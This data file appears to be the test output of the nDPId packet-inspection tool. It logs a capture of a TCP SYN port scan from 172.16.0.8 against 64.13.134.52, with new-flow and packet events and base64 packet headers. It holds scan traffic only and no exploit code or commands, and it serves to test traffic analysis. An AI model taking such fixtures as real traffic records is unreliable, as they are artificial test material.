+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"synscan.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":1,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058346,"pkt":"ACYLMQczACWzv5HuCABFAAAsEvoAADIGA3msEAAIQA2GNIzSd\/7dUoMYAAAAAGACDAC0kAAAAgQFtA=="} 
+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":215,"source":"synscan.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":808,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"synscan.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":1,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058346,"pkt":"ACYLMQczACWzv5HuCABFAAAsK3gAADkG4\/qsEAAIQA2GNIzSAyjdUoMYAAAAAGACCAAtZwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":216,"source":"synscan.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6543,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"synscan.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":1,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058346,"pkt":"ACYLMQczACWzv5HuCABFAAAsU\/gAACsGyXqsEAAIQA2GNIzSGY\/dUoMYAAAAAGACEAAPAAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":217,"source":"synscan.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3071,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"synscan.pcap","alias":"nDPId-test","flow_id":211,"flow_packet_id":1,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058346,"pkt":"ACYLMQczACWzv5HuCABFAAAsr1oAADIGZxisEAAIQA2GNIzSC\/\/dUoMYAAAAAGACDAAgkAAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":218,"source":"synscan.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":218,"source":"synscan.pcap","alias":"nDPId-test","flow_id":212,"flow_packet_id":1,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058346,"pkt":"ACYLMQczACWzv5HuCABFAAAs4hsAACUGQVesEAAIQA2GNIzSE6ndUoMYAAAAAGACCAAc5gAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":219,"source":"synscan.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":219,"source":"synscan.pcap","alias":"nDPId-test","flow_id":213,"flow_packet_id":1,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058346,"pkt":"ACYLMQczACWzv5HuCABFAAAsyIQAACkGVu6sEAAIQA2GNIzSBEfdUoMYAAAAAGACCAAsSAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":220,"source":"synscan.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1064,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"synscan.pcap","alias":"nDPId-test","flow_id":214,"flow_packet_id":1,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058346,"pkt":"ACYLMQczACWzv5HuCABFAAAsROwAADEG0oasEAAIQA2GNIzSBCjdUoMYAAAAAGACCAAsZwAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":221,"source":"synscan.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"synscan.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":1,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058346,"pkt":"ACYLMQczACWzv5HuCABFAAAsBKEAACYGHdKsEAAIQA2GNIzSBFfdUoMYAAAAAGACDAAoOAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":222,"source":"synscan.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8649,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":222,"source":"synscan.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":1,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058346,"pkt":"ACYLMQczACWzv5HuCABFAAAsbn0AACgGsfWsEAAIQA2GNIzSIcndUoMYAAAAAGACBAASxgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":223,"source":"synscan.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":223,"source":"synscan.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":1,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058346,"pkt":"ACYLMQczACWzv5HuCABFAAAskbgAACwGirqsEAAIQA2GNIzSCDPdUoMYAAAAAGACBAAsXAAAAgQFtA=="} 
+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":224,"source":"synscan.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":765,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":224,"source":"synscan.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":1,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058346,"pkt":"ACYLMQczACWzv5HuCABFAAAsrooAADsGXuisEAAIQA2GNIzSAv3dUoMYAAAAAGACEAAlkgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":225,"source":"synscan.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":225,"source":"synscan.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":1,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058346,"pkt":"ACYLMQczACWzv5HuCABFAAAs9kUAADAGIi2sEAAIQA2GNIzSIzLdUoMYAAAAAGACBAARXQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":226,"source":"synscan.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9071,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":226,"source":"synscan.pcap","alias":"nDPId-test","flow_id":220,"flow_packet_id":1,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058346,"pkt":"ACYLMQczACWzv5HuCABFAAAsPSYAADMG2EysEAAIQA2GNIzSI2\/dUoMYAAAAAGACEAAFIAAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":227,"source":"synscan.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49155,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":227,"source":"synscan.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":1,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058405,"pkt":"ACYLMQczACWzv5HuCABFAAAsda8AACkGqcOsEAAIQA2GNIzTwAPdU4MZAAAAAGACCABwiAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":228,"source":"synscan.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2190,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":228,"source":"synscan.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":1,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058405,"pkt":"ACYLMQczACWzv5HuCABFAAAsQxYAADYGz1ysEAAIQA2GNIzTCI7dU4MZAAAAAGACDAAj\/gAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":229,"source":"synscan.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":229,"source":"synscan.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":1,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058405,"pkt":"ACYLMQczACWzv5HuCABFAAAsrvQAADUGZH6sEAAIQA2GNIzTC7ndU4MZAAAAAGACCAAk0wAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":230,"source":"synscan.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":230,"source":"synscan.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":1,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058405,"pkt":"ACYLMQczACWzv5HuCABFAAAsMq8AACsG6sOsEAAIQA2GNIzTGbTdU4MZAAAAAGACEAAO2AAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":231,"source":"synscan.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1583,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":231,"source":"synscan.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":1,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058405,"pkt":"ACYLMQczACWzv5HuCABFAAAs05oAADgGPNisEAAIQA2GNIzTBi\/dU4MZAAAAAGACBAAuXQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":232,"source":"synscan.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27355,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":232,"source":"synscan.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":1,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058405,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/+QAADUGE46sEAAIQA2GNIzTatvdU4MZAAAAAGACCADFsAAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":233,"source":"synscan.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9898,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":233,"source":"synscan.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":1,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058405,"pkt":"ACYLMQczACWzv5HuCABFAAAsD6EAADkG\/9GsEAAIQA2GNIzTJqrdU4MZAAAAAGACCAAJ4gAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":234,"source":"synscan.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5825,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":234,"source":"synscan.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":1,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058405,"pkt":"ACYLMQczACWzv5HuCABFAAAsihkAACcGl1msEAAIQA2GNIzTFsHdU4MZAAAAAGACEAARywAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":235,"source":"synscan.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1641,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"synscan.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":1,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058405,"pkt":"ACYLMQczACWzv5HuCABFAAAsQFEAADgG0CGsEAAIQA2GNIzTBmndU4MZAAAAAGACBAAuIwAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":236,"source":"synscan.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32768,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"synscan.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":1,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058405,"pkt":"ACYLMQczACWzv5HuCABFAAAs+A4AACkGJ2SsEAAIQA2GNIzTgADdU4MZAAAAAGACCACwiwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":237,"source":"synscan.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9575,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"synscan.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":1,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058405,"pkt":"ACYLMQczACWzv5HuCABFAAAsyBsAADAGUFesEAAIQA2GNIzTJWfdU4MZAAAAAGACBAAPJQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":238,"source":"synscan.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1043,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":238,"source":"synscan.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":1,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058405,"pkt":"ACYLMQczACWzv5HuCABFAAAsr+YAAC4GaoysEAAIQA2GNIzTBBPdU4MZAAAAAGACDAAoeQAAAgQFtA=="} 
